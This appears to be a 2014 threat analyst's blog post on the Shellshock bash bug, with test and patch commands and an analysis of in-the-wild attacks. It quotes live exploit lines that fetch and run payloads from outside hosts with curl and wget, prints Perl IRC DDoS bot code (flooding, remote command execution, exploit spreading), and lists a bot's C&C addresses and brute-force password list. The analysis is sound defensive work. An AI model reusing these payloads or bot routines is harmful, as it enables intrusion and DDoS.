Update [26-09-2014] If I get some time over the weekend, I’ll provide a follow up post with a full analysis of the ELF binary. Already, I’ve seen additional requests to my box (and public reports) of PE binaries being downloaded as final payloads. Additionally, reports have also surfaced of a botnet dubbed “Wopbot” which is being used to target the US DoD spreading via shellshock.
Just two days ago, September 24, Stephane Chazelas discovered a bash vulnerability – CVE-2014-6271 – which he disclosed on seclists (http://seclists.org/oss-sec/2014/q3/649). In his post, he briefly describes a bug he identified in the way environment variables through server side scripts are handled e.g. CGI, Python, perl etc that can lead to arbitrary code execution. In addition, other network services are also potential vectors for this attack; ssh, dhclient, sudo, firefox, postfix etc all of which can lead to arbitrary command execution on a remote server.
Update [26-09-2014]: The original patch released for CVE-2014-6271 was incomplete. Tavis posted a work-around on twitter:
The bash patch seems incomplete to me, function parsing is still brittle. e.g. $ env X='() { (a)=>\' sh -c "echo date"; cat echo
— Tavis Ormandy (@taviso) September 24, 2014
This was allocated CVE-2014-7169 and has since been patched. Don’t forget to update again, people!
Please see this StackExchange post for a good explanation on the vulnerable code in bash.
Are you vulnerable?
Interestingly enough, this bug affects bash versions up to 4.2 (that’s 25 years this vulnerability has existed).
To test if you’re vulnerable, open a terminal and execute the following command:
CVE-2014-6271
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
or
CVE-2014-7169
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
In the above example for CVE-2014-6271 , an environment variable ‘x’ is created with a minimalist function ‘{:;}’. Due to the bug in bash, it proceeds to execute code following after the function. Executing this on a vulnerable version of bash will result in the following:
vulnerable
this is a test
If you execute the same command on a version of bash which has been patched, you should see the following error:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
In a similar fashion, the PoC for CVE-2014-7169 should print the date if vulnerable.
Update Bash
In order to mitigate this issue, update bash ASAP. This can be done through your standard distro package management tools such as apt-get, yum etc.
$ sudo apt-get update bash
or
$ sudo yum update bash
Attacks ITW
Already, I’ve begun to receive requests to some of my boxes attempting to exploit this vulnerability.
80 209.126.230.72 - - [24/Sep/2014:23:40:04 +0200] "GET / HTTP/1.0" 200 324 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
80 209.126.230.72 - - [25/Sep/2014:09:27:53 +0200] "GET / HTTP/1.0" 200 324 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
80 213.5.67.223 - - [25/Sep/2014:15:44:44 +0200] "GET /cgi-bin/his HTTP/1.0" 404 491 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
In the above, the first two log entries are from a internet wide scan being conducted by Erratasec who is currently scanning every IP in IPv4 to get an idea of how many vulnerable services are out there. Obviously, other malicious attackers are performing the same scan. The last entry in the above is the most interesting. We can see an actual attempt to exploit this vulnerability in order to download a file called ‘jur’.
/bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
Jur Binary
Downloading the binary we have the following file:
$ md5sum jur
0763b8c00d6862d2d0f8f980de065857 jur
$ file jur
jur; a /usr/bin/perl script text executable
The file itself is a perl script which acts as an IRC bot used to perform DDoS attacks. The bot joins ‘185.31.209.84:443’ using a random nick name.
my @adms=("JB","x");
my @hostauth=("fuckoff","localhost");
my @canais=("#new");
chop (my $realname = 'vn');
$servidor='185.31.209.84' unless $servidor;
my $porta='443';
..
#$servidor="$ARGV[0]" if $ARGV[0];
Next, it connects to the IRC server:
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sendraw("PASS swedenrocks");
It joins a key protected channel #new using the key ‘ddosit’ as per the following:
sendraw("JOIN $canal ddosit");
Port Scanning:
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[SCAN]02 Scanning ".$1." for open ports.");
..
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[SCAN]02 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :02[SCAN]02 No open ports found");
}
- DDoS Attacks
- TCP FLooder
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[TCP]02 Attacking ".$1.":".$2." for ".$3." seconds.");
..
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[TCP]02 Attack done ".$1.":".$2.".");
}
In a similar fashion to the TCP Flooder above it also performs DDoS using HTTP and UDP.
Scans for unpatched INDEXU:
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[GOOGLE]02 Scanning for unpatched INDEXU for ".$1."
seconds.");
..
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
..
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[GOOGLE]02 Exploited ".$exploited." boxes in ".$1."
It also has teh ability to run arbitary commands by the attacker and print results to the IRC channel.
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
Spreader
Finally, it includes a spreading mechanism by searching Google:
foreach $dom (@dominios)
{
push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
}
Ngnix Binary
There has also been reports of the following exploit attempts identified ITW:
:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh
The above binary was retrievable:
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ file ngnix
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
Quick Notes
Looking a the sample quickly, we have the following:
Embedded IPs
108.162.197.26
89.238.150.154:5
The first IP is assoicated with Cloudflare and has since been neutralised. It is believed this was used to obtain the IP of the infected machine. The second is the hard-coded C&C. In my testing the C&C is no longer responding. However, I did stumble across some additional information about this binary whereby someone managed to capture traffic when it was live:
https://news.ycombinator.com/item?id=8366088
sent >>> BUILD X86
recv >>> !* HTTP
recv >>> 190.93.240.15,190.93.241.15,141.101.112.16,190.93.243.15,190.93.242.15 pastebin.com /4HQ2w4AZ 80 2 recv >>> PING sent >>> PONG
Looking at the binary itself we can see it tests the machine it has gotten access to. This may done to identify honeypot type machines, or to identify if the machine itself is a router using busybox:
/bin/busybox;echo -e '\147\141\171\146\147\164'
Standard shell interperters won’t convert the octal to ascii. However, busybox does:
$ echo -e '\147\141\171\146\147\164'
\147\141\171\146\147\164
$ busybox echo -e '\147\141\171\146\147\164'
gayfgt
The commands supported by the bot are as follows:
PING
PONG!
GETLOCALIP
SCANNER
ON
HOLD - DDoS - Hold Flooding
JUNK - DDoS - Junk Flooding
UDP - DDoS - UDP Flooding
TCP - DDoS - TCP FLooding
KILLATTK
LOLNOGTFO
DUP
SH
It also conbtains the following password list for simple brute-force:
.rodata:080AD157 00000005 C root
.rodata:080AD15F 00000006 C admin
.rodata:080AD166 00000005 C user
.rodata:080AD16C 00000006 C login
.rodata:080AD173 00000006 C guest
.rodata:080AD17A 00000005 C toor
.rodata:080AD180 00000009 C changeme
.rodata:080AD18A 00000005 C 1234
.rodata:080AD190 00000006 C 12345
.rodata:080AD197 00000007 C 123456
.rodata:080AD19F 00000008 C default
.rodata:080AD1A8 00000005 C pass
.rodata:080AD1AE 00000009 C password
This is a similar IRC bot to the Perl script identified above.
Additional Info:
This ELF sample has been floating around since at least March:
At that time, it used the following C&C:
162.219.57.16:2000
A Threat Analyst's Notebook 